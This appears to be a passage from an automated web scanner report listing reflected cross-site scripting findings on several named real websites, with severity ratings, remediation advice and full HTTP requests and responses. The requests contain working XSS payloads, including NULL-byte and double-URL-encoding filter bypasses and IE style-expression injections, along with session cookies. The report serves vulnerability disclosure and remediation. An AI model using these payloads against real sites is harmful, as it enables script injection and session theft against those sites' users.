The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009f75f"><script>alert(1)</script>ddf7c1767f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f75f"><script>alert(1)</script>ddf7c1767f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/sitemap.html?%009f75f"><script>alert(1)</script>ddf7c1767f3=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 14:11:59 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 32253 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
4.450. https://www.bbt.com/images/chat/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.bbt.com
Path:
/images/chat/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a1daf"><script>alert(1)</script>1641a099e6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a1daf"><script>alert(1)</script>1641a099e6e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /images/chat/?%00a1daf"><script>alert(1)</script>1641a099e6e=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:33 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 207 cache-control: private x-powered-by: ASP.NET Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)
4.451. https://www.bbt.com/images/chat/oao-matrix/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.bbt.com
Path:
/images/chat/oao-matrix/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00de7c6"><script>alert(1)</script>3830aed06ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as de7c6"><script>alert(1)</script>3830aed06ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /images/chat/oao-matrix/?%00de7c6"><script>alert(1)</script>3830aed06ac=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:34 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 218 cache-control: private x-powered-by: ASP.NET Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)
4.452. https://www.bbt.com/images/chat/oao/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.bbt.com
Path:
/images/chat/oao/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00fd8c7"><script>alert(1)</script>c4970a877ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fd8c7"><script>alert(1)</script>c4970a877ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /images/chat/oao/?%00fd8c7"><script>alert(1)</script>c4970a877ed=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:35 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 211 cache-control: private x-powered-by: ASP.NET Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)
4.453. https://www.bbt.com/images/chat/vcsp/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.bbt.com
Path:
/images/chat/vcsp/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ae575"><script>alert(1)</script>447eca9d97b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ae575"><script>alert(1)</script>447eca9d97b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /images/chat/vcsp/?%00ae575"><script>alert(1)</script>447eca9d97b=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:39 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 212 cache-control: private x-powered-by: ASP.NET Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)
4.454. http://www.brothercake.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.brothercake.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 350fe"><script>alert(1)</script>79cd7322848 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 350fe\"><script>alert(1)</script>79cd7322848 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?350fe"><script>alert(1)</script>79cd7322848=1 HTTP/1.1 Host: www.brothercake.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:22:32 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Cache-control: private Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Set-Cookie: PHPSESSID=3f722a0b27bbf1e02a7a38b563ec2988; path=/ Connection: close Content-Type: text/html Content-Length: 20228
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14aca%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee268f1e14c1 was submitted in the cat parameter. This input was echoed as 14aca"><script>alert(1)</script>e268f1e14c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the cat request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services14aca%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee268f1e14c1&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1 Host: www.local.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Cteonnt-Length: 1107 Vary: Accept-Encoding Date: Thu, 03 Feb 2011 16:25:15 GMT Connection: close Content-Length: 1107
The value of the cat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 629be%2527%253balert%25281%2529%252f%252f3d8ca4cb923 was submitted in the cat parameter. This input was echoed as 629be';alert(1)//3d8ca4cb923 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the cat request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services629be%2527%253balert%25281%2529%252f%252f3d8ca4cb923&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1 Host: www.local.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Cteonnt-Length: 1062 Vary: Accept-Encoding Date: Thu, 03 Feb 2011 16:25:15 GMT Connection: close Content-Length: 1062
The value of the css request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36ffb"style%3d"x%3aexpression(alert(1))"4094d82a023 was submitted in the css parameter. This input was echoed as 36ffb"style="x:expression(alert(1))"4094d82a023 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cd27'%3b570d9e9b527 was submitted in the l parameter. This input was echoed as 9cd27';570d9e9b527 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the l request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe54b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e710dcff3a6b was submitted in the l parameter. This input was echoed as fe54b"><script>alert(1)</script>710dcff3a6b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the l request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of the ord request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5d33"style%3d"x%3aexpression(alert(1))"2ea0dbdbd7e was submitted in the ord parameter. This input was echoed as e5d33"style="x:expression(alert(1))"2ea0dbdbd7e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the ord request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80630'%3bc205c1fb2ef was submitted in the ord parameter. This input was echoed as 80630';c205c1fb2ef in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 142ef'%3b04d7f2c0dea was submitted in the p parameter. This input was echoed as 142ef';04d7f2c0dea in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the p request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4a96"style%3d"x%3aexpression(alert(1))"957bd801f83 was submitted in the p parameter. This input was echoed as f4a96"style="x:expression(alert(1))"957bd801f83 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 795a7'%3b1996a89d919 was submitted in the pos parameter. This input was echoed as 795a7';1996a89d919 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pos request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a068"style%3d"x%3aexpression(alert(1))"c701155616e was submitted in the pos parameter. This input was echoed as 6a068"style="x:expression(alert(1))"c701155616e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the sz request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d243c"style%3d"x%3aexpression(alert(1))"d187ae2a24b was submitted in the sz parameter. This input was echoed as d243c"style="x:expression(alert(1))"d187ae2a24b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9fc55'%3b14f61c68560 was submitted in the sz parameter. This input was echoed as 9fc55';14f61c68560 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58aaf'%3bb65e854cbc0 was submitted in the t parameter. This input was echoed as 58aaf';b65e854cbc0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf3d9"style%3d"x%3aexpression(alert(1))"9c6370ca462 was submitted in the t parameter. This input was echoed as cf3d9"style="x:expression(alert(1))"9c6370ca462 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the zone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15298%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253effbd7ca082c was submitted in the zone parameter. This input was echoed as 15298"><script>alert(1)</script>ffbd7ca082c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the zone request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_1502010015298%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253effbd7ca082c HTTP/1.1 Host: www.local.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Cteonnt-Length: 1107 Vary: Accept-Encoding Date: Thu, 03 Feb 2011 16:25:17 GMT Connection: close Content-Length: 1107
The value of the zone request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc52c%2527%253balert%25281%2529%252f%252fd85ccbd701b was submitted in the zone parameter. This input was echoed as fc52c';alert(1)//d85ccbd701b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the zone request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100fc52c%2527%253balert%25281%2529%252f%252fd85ccbd701b HTTP/1.1 Host: www.local.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Cteonnt-Length: 1062 Vary: Accept-Encoding Date: Thu, 03 Feb 2011 16:25:17 GMT Connection: close Content-Length: 1062
4.472. http://www.local.com/events/category/music/dallas-tx.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.local.com
Path:
/events/category/music/dallas-tx.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c9e7'-alert(1)-'22f4ee6710f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
